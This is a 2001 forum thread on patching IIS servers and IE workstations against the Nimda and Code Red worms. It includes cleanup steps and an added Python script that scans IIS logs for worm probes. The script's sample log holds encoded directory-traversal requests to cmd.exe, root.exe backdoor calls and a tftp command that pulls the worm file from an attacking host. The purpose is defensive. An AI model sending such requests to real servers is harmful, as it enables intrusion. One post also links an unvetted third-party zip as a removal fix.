
Need to Patch a development server?

kellykln asked:
We are being hit again and again with viruses, the latest being the new Nimda. I have 3 servers on my network: 2 NT and 1 W2K Server. Only one of my NT machines is open to the outside, and it is also a mail server. I have made sure to apply all the patches and service packs to IIS etc. on that one machine that is open to the internet. Do I have to patch my other servers, on which I use IIS only for development and on my local intranet? I also have workstations running PWS for development. Do these have to be patched? Do I have to upgrade from IE 5 to IE 5.5 on my workstations, or is it enough on my server that is running IIS as a real web server?


Commented:
I would patch everything, since experience has shown that Nimda gets into ANY server running IIS and some other services.

The list of services that stop under Code Red:
    WWW Publishing Service
    MS SMTP Service
    FTP Publishing Service
    Site Server Authentication Service
    Site Server LDAP Service
------------------

I would err on the side of caution here!

I hope this helps!

Author

Commented:
I'd like to hear more about this subject. Where can I get more info for this specific question
Commented:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms01-033.asp

Do you have Explorer.exe in your root directory (e.g. c:\explorer.exe)? If so, you have version 2 of Code Red. You will need an extraction tool; a simple reboot and patch will not fix it.

Here is a link to the info:
http://www.antivirus.com/vinfo/security/readme_codec.txt

Here is a link to the tool:
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=CODERED.C

Patches are available for both the IIS vulnerability and Web browsers at http://www.microsoft.com/security.

Nimda Virus
From: Silvers5    Date: 09/24/2001 10:31PM

Please follow these steps strictly to remove the worm and shield the systems on the network; they've proven effective:

1. Check the system. If it is Windows 2000, check whether IIS 5 is installed (go to Services and see if there is an IISADMIN service). If so, apply the patch provided for IIS 5; if the system asks for Service Pack 1, get it from IIS.
   If the system is an NT Server or NT Workstation, check whether the Option Pack and IIS 4 are installed, and patch IIS 4 using the IIS4.exe patch.
   If IIS is not needed on a system, DISABLE it from the Services panel.
2. Then check Internet Explorer. If it is IE 5.0 or 5.01, apply the patch for IE 5.01; if it is 5.5, apply the IE 5.5 patch. In some cases, if the system is already patched, it will pop up that it doesn't need an update.
3. Only now install McAfee antivirus with the latest DAT and DAT fix and perform a full scan of ALL files on fixed disks, set to clean automatically.
4. If no infection is found, the system is now secure only for as long as it is protected by VShield. You NEED to set VShield to scan ALL files. I noticed in all cases that VShield will reset to scanning application files only after the station is restarted; it is important to tell users to reconfigure the settings to scan all.
5. If, alas, an infection is detected, let McAfee finish the scans, then go to Users and Groups in Computer Management (on Win2K, or where applicable on NT) and select the Guest account. It should be in the Administrators group and the Guests group; remove it from both, rename the Guest account and disable it. Check the WINNT share and remove Change or Full permissions for Everyone (set it to Read). If IIS must be disabled, disable the IUSR_machinename account too.
   Delete all the TFTP* files from the inetpub/scripts dir (or below), since these are the worm copies; McAfee will only clean them.
   Reboot the server, or better, unplug the power cable, since the worm will be resident in memory, and it seems that in some cases it detects shutdown attempts and can delay the shutdown process to copy itself to the HDD, alter the registry or system.ini, and restart on the next reload.
   The infected machine should be disconnected from the LAN (quarantined). It is recommended to return to that machine every 30 minutes and rescan it; if more infections are noticed, unplug the system again after the scan and recheck after 30 minutes until there are no more infections (don't forget to check and set VShield to scan all files on each reboot).

This fix will remove the virus completely too:
http://newdata.box.sk/hx/nimdascn.zip
--
In my office environment, I found myself in the role of emergency virus security chief when our vice president of sales detected the Nimda virus on his notebook computer during a routine daily antivirus scan. Fortunately, the infection was restricted to a group of files in his Temporary Internet Files folder, and the virus had not executed.

When Nimda infects a Web server, the virus serves a file (readme.eml) that versions of Internet Explorer (IE) prior to 5.5 Service Pack 2 (SP2) will automatically download and execute. To make sure this type of virus can't propagate, you need to update local systems to a more secure version of IE and patch Outlook to prevent the virus from using Outlook as a Messaging API (MAPI) server to send email.

Here's a list of basic rules that I put together for our organization's users to follow:
   1. Upgrade to IE 5.5 SP2 or IE 6 ( http://www.microsoft.com/ie ).
   2. Patch your version of Outlook to the current service pack and apply security fixes.
   3. Turn on file extensions.
      a. Never open an attachment with two extensions (e.g., readme.doc.pif).
      b. Never open any executable attachments.
      c. If you don't recognize the extension, ask for help.

I provided detailed instructions for performing these tasks and made sure that local copies of all necessary files were available on the network. The most annoying part of updating these client machines was that even though we have a standard vendor for desktop systems, not every user's machine ran the same version of Office 2000 (e.g., some had the Small Business version, and some had the Premium version), and because the computers came with the software preinstalled, we didn't have any network shares with all the setup files. When applying the fixes to Outlook, we had to find the Office installation disk specific to each Office 2000 installation.

Applying the security fixes to Outlook also caused a minor annoyance that I'm still explaining to users. The security patch doesn't let other applications use the Outlook MAPI server without permission from the local user. Many users in my company use a contact manager that synchronizes by sending an email message. I was flooded with calls from users worried about the new pop-up message they received when they tried to perform their daily synchronization. Although users grumbled a bit about the extra two mouse clicks now required to synchronize, everyone understood the need after I explained why it worked this way.

------------------------
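As an added example (not part of any post in this thread, and not a tool from any vendor named above): the comments say Nimda walks from one IIS host to the next, which is why the development boxes and PWS workstations matter too. The quickest way to see whether that is already happening on your intranet is to scan the IIS logs for the worm's probe requests. The script below does that for W3C-extended log files. The request strings it looks for are the ones the public Nimda and Code Red II write-ups document: the root.exe backdoor under /scripts and /MSADC, the /c and /d drive-letter virtual directories, and "..\" traversal to cmd.exe hidden behind single, double and overlong-UTF-8 percent-encoding; the overlong byte pairs and the sample log are my assumptions and constructed test data, not a real capture.

```python
"""Scan IIS W3C-extended log lines for the HTTP probes Nimda and Code Red II
used to move between IIS hosts.  Added illustration; the probe strings are
the ones the public advisories list, the sample log is constructed."""
from collections import Counter
from typing import Optional
from urllib.parse import unquote_to_bytes
import re

# Byte pairs a vulnerable IIS canonicaliser accepted as '/' or '\'
# (overlong UTF-8 forms plus two malformed forms IIS also decoded). Assumed set.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc0\x2f": b"/",
            b"\xc1\x9c": b"\\", b"\xc1\x1c": b"\\"}


def canonical(raw: str) -> str:
    """Reduce a request target to what the vulnerable server acted on:
    percent-decode until nothing changes (so %255c -> %5c -> '\\'), map the
    overlong pairs, fold '\\' to '/' and lower-case the result."""
    data = raw.encode("latin-1", "replace")
    for _ in range(4):                      # each pass peels one encoding layer
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    for bad, good in OVERLONG.items():
        data = data.replace(bad, good)
    return data.decode("latin-1").replace("\\", "/").lower()


def classify(target: str) -> Optional[str]:
    """Return a short reason if the target looks like a worm probe, else None."""
    c = canonical(target)
    if "root.exe" in c:
        return "root.exe backdoor call (Code Red II)"
    if "cmd.exe" in c:
        if "tftp" in c:
            return "cmd.exe used to tftp a file in (worm drop)"
        if "../" in c:
            return "directory traversal to cmd.exe"
        if re.match(r"^/[a-z]/winnt/system32/cmd\.exe", c):
            return "cmd.exe via drive-letter virtual directory"
        return "direct cmd.exe request"
    return None


def scan(log_text: str) -> list:
    """Parse W3C extended log text (fields taken from the #Fields: header)
    and return one dict per line that classify() flags."""
    fields, hits = None, []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#") or fields is None:
            continue
        cols = line.split()
        if len(cols) != len(fields):        # malformed line: skip, don't crash
            continue
        rec = dict(zip(fields, cols))
        stem, query = rec.get("cs-uri-stem", ""), rec.get("cs-uri-query", "-")
        reason = classify(stem if query == "-" else f"{stem}?{query}")
        if reason:
            hits.append({"ip": rec.get("c-ip"), "path": stem,
                         "status": rec.get("sc-status"), "reason": reason})
    return hits


def sources(hits: list) -> dict:
    """Probe count per source IP: the hosts to pull off the LAN and clean."""
    return dict(Counter(h["ip"] for h in hits))


# Constructed sample in IIS 5 W3C extended format (not a real capture).
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 13:00:01 192.0.2.10 GET /default.htm - 200
2001-09-18 13:00:02 192.0.2.77 GET /scripts/root.exe /c+dir 404
2001-09-18 13:00:02 192.0.2.77 GET /MSADC/root.exe /c+dir 404
2001-09-18 13:00:03 192.0.2.77 GET /c/winnt/system32/cmd.exe /c+dir 404
2001-09-18 13:00:03 192.0.2.77 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:00:04 192.0.2.77 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 404
2001-09-18 13:00:04 192.0.2.77 GET /scripts/..%%35%63../winnt/system32/cmd.exe /c+dir 404
2001-09-18 13:00:05 192.0.2.77 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp%20-i%20192.0.2.77%20GET%20Admin.dll%20c:\Admin.dll 502
2001-09-18 13:00:06 192.0.2.10 GET /images/logo.gif - 200
2001-09-18 13:00:07 192.0.2.10 GET /docs/readme.html - 200
"""

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"{h['ip']:<12} {h['status']}  {h['reason']:<45} {h['path']}")
    print("probes per source:", sources(scan(SAMPLE_LOG)))
```

Point it at the log directory of each IIS and PWS box, not just the public web server: any internal address in the per-source count is an infected machine that needs the quarantine-and-clean steps above, and a 200 on one of the traversal lines means the request got through to cmd.exe, i.e. that host was unpatched when it was hit. The decoder deliberately over-decodes (it keeps stripping percent-encoding until nothing changes) because that is the behaviour the worm exploited; a plain single unquote() would miss the %255c and %%35%63 forms.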
Asta Cu (Technical consultant & graphic design)

Commented:
Please update the experts here who have so willingly stepped in to help you, since much time has passed since your last comments, and Email notifications may not have been generated to the participating experts here due to some problems at that time.  If you've been helped, accept the respective comment by that expert to grade and close it.

To see all your Open and Locked questions, click your member profile and View Question history to update/close them as well.

Somewhat off-topic, but important.

****************************** ALERT********************************
WindowsUpdate - Critical Update alert March 28, 2002 from Microsoft
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-015.asp
Synopsis:
Microsoft Security Bulletin MS02-015  
28 March 2002 Cumulative Patch for Internet Explorer
Originally posted: March 28, 2002
Summary
Who should read this bulletin: Customers using Microsoft® Internet Explorer
Impact of vulnerability: Two vulnerabilities, the most serious of which would allow script to run in the Local Computer Zone.
Maximum Severity Rating: Critical
Recommendation: Consumers using the affected version of IE should install the patch immediately.
Affected Software:
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0

Thought you'd appreciate knowing this.
":0)
Asta

Author

Commented:
I tried to give sysexpert points but I get the following error when I do:
type Exception report

message Internal Server Error

description The server encountered an internal error (Internal Server Error) that prevented it from fulfilling this request.

exception

org.apache.jasper.JasperException: Unable to compile class for JSPNote: sun.tools.javac.Main has been deprecated.


An error occurred between lines: 1 and 40 in the jsp file: /jsp/../shared/emailCommentAdded.jsp

Generated servlet error:
/home/ee/tomcat/work/localhost/_/jsp/qAcceptComment$jsp.java:1010: Undefined variable or class name: ta
                     emailBody2 = ta.getPathFromCache() + "Q_" + qId + ".html\n\n";
                                  ^


An error occurred between lines: 1 and 41 in the jsp file: /jsp/../shared/emailAcceptAnswer.jsp

Generated servlet error:
/home/ee/tomcat/work/localhost/_/jsp/qAcceptComment$jsp.java:1090: Undefined variable or class name: ta
                     emailBody2 =  ta.getPathFromCache() + "Q_" + qId + ".html\n\n";
                                   ^


An error occurred between lines: 1 and 54 in the jsp file: /jsp/../shared/emailAcceptAnswerOwner.jsp

Generated servlet error:
/home/ee/tomcat/work/localhost/_/jsp/qAcceptComment$jsp.java:1153: Undefined variable or class name: ta
                     emailBody2 = ta.getPathFromCache() + "Q_" + qId + ".html\n\n";
                                  ^
Note: /home/ee/tomcat/work/localhost/_/jsp/qAcceptComment$jsp.java uses or overrides a deprecated API.  Recompile with "-deprecation" for details.
3 errors, 2 warnings

      at org.apache.jasper.compiler.Compiler.compile(Compiler.java:285)
      at org.apache.jasper.servlet.JspServlet.loadJSP(JspServlet.java:552)
      at org.apache.jasper.servlet.JspServlet$JspServletWrapper.loadIfNecessary(JspServlet.java:177)
      at org.apache.jasper.servlet.JspServlet$JspServletWrapper.service(JspServlet.java:189)
      at org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:382)
      at org.apache.jasper.servlet.JspServlet.service(JspServlet.java:474)
      at com.ee.servlet.RedirectJspServlet.service(RedirectJspServlet.java:80)
      at javax.servlet.http.HttpServlet.service(HttpServlet.java:853)
      at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:247)
      at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:193)
      at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:243)
      at org.apache.catalina.core.StandardPipeline.invokeNext(StandardPipeline.java:566)
      at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:472)
      at org.apache.catalina.core.ContainerBase.invoke(ContainerBase.java:943)
      at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:190)
      at org.apache.catalina.core.StandardPipeline.invokeNext(StandardPipeline.java:566)
      at org.apache.catalina.valves.CertificatesValve.invoke(CertificatesValve.java:246)
      at org.apache.catalina.core.StandardPipeline.invokeNext(StandardPipeline.java:564)
      at com.ee.servlet.HandleJspServlet.invoke(HandleJspServlet.java:101)
      at org.apache.catalina.core.StandardPipeline.invokeNext(StandardPipeline.java:564)
      at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:472)
      at org.apache.catalina.core.ContainerBase.invoke(ContainerBase.java:943)
      at org.apache.catalina.core.StandardContext.invoke(StandardContext.java:2343)
      at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:180)
      at org.apache.catalina.core.StandardPipeline.invokeNext(StandardPipeline.java:566)
      at org.apache.catalina.valves.ErrorDispatcherValve.invoke(ErrorDispatcherValve.java:170)
      at org.apache.catalina.core.StandardPipeline.invokeNext(StandardPipeline.java:564)
      at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:170)
      at org.apache.catalina.core.StandardPipeline.invokeNext(StandardPipeline.java:564)
      at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:472)
      at org.apache.catalina.core.ContainerBase.invoke(ContainerBase.java:943)
      at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:174)
      at org.apache.catalina.core.StandardPipeline.invokeNext(StandardPipeline.java:566)
      at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:472)
      at org.apache.catalina.core.ContainerBase.invoke(ContainerBase.java:943)
      at org.apache.ajp.tomcat4.Ajp13Processor.process(Ajp13Processor.java:458)
      at org.apache.ajp.tomcat4.Ajp13Processor.run(Ajp13Processor.java:551)
      at java.lang.Thread.run(Thread.java:536)



--------------------------------------------------------------------------------
Asta Cu (Technical consultant & graphic design)

Commented:
Engineering is working to fix this problem. Perhaps SysExpert can Propose an Answer here for you to then accept and grade to close; this has been a workaround to this roadblock.
":0) Asta

Author

Commented:
Thanks, sorry for the delay in points. I tried before but it wouldn't go through
Asta Cu (Technical consultant & graphic design)

Commented:
Thank you for returning and finalizing this.  Sorry you had access problems; things should be improving given the work our Engineering team has been doing.  If you continue to encounter problems, post a zero point question in the Community Support topic area to get help.

":0) Asta
